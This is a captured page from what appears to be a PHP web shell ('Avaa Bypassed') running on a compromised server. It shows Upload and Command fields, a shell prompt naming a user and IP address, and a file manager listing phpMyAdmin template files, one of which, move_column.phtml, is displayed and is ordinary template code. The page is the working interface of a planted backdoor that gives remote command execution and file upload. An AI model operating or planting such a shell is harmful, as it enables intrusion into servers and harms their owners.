404

[ Avaa Bypassed ]




Upload:

Command:

botdev@13.59.219.20: ~ $
<select id="field_<?= $columnNumber; ?>_<?= ($ci - $ci_offset); ?>"
        name="field_move_to[<?= $columnNumber; ?>]"
        size="1"
        width="5em">
    <option value="" selected="selected">&nbsp;</option>
    <option value="-first" <?= ($current_index == 0 ? ' disabled="disabled"' : ''); ?>>
        <?= __('first'); ?>
    </option>
    <?php for ($mi = 0, $cols = count($move_columns); $mi < $cols; $mi++): ?>
        <option value="<?= htmlspecialchars($move_columns[$mi]->name); ?>"
                <?= (($current_index == $mi || $current_index == $mi + 1) ? ' disabled="disabled"' : '');?>>
            <?= sprintf(__('after %s'), PMA\libraries\Util::backquote(htmlspecialchars($move_columns[$mi]->name))); ?>
        </option>
    <?php endfor; ?>
</select>

Filemanager

Name Type Size Permission Actions
column_adjust_privileges.phtml File 716 B 0644
column_attribute.phtml File 1.01 KB 0644
column_attributes.phtml File 8.34 KB 0644
column_auto_increment.phtml File 350 B 0644
column_comment.phtml File 485 B 0644
column_default.phtml File 1.82 KB 0644
column_definitions_form.phtml File 6.59 KB 0644
column_extra.phtml File 316 B 0644
column_indexes.phtml File 1.32 KB 0644
column_length.phtml File 458 B 0644
column_name.phtml File 1.46 KB 0644
column_null.phtml File 356 B 0644
column_type.phtml File 390 B 0644
column_virtuality.phtml File 1.43 KB 0644
mime_type.phtml File 897 B 0644
move_column.phtml File 774 B 0644
partitions.phtml File 8.25 KB 0644
table_fields_definitions.phtml File 4.91 KB 0644
transformation.phtml File 1.4 KB 0644
transformation_option.phtml File 471 B 0644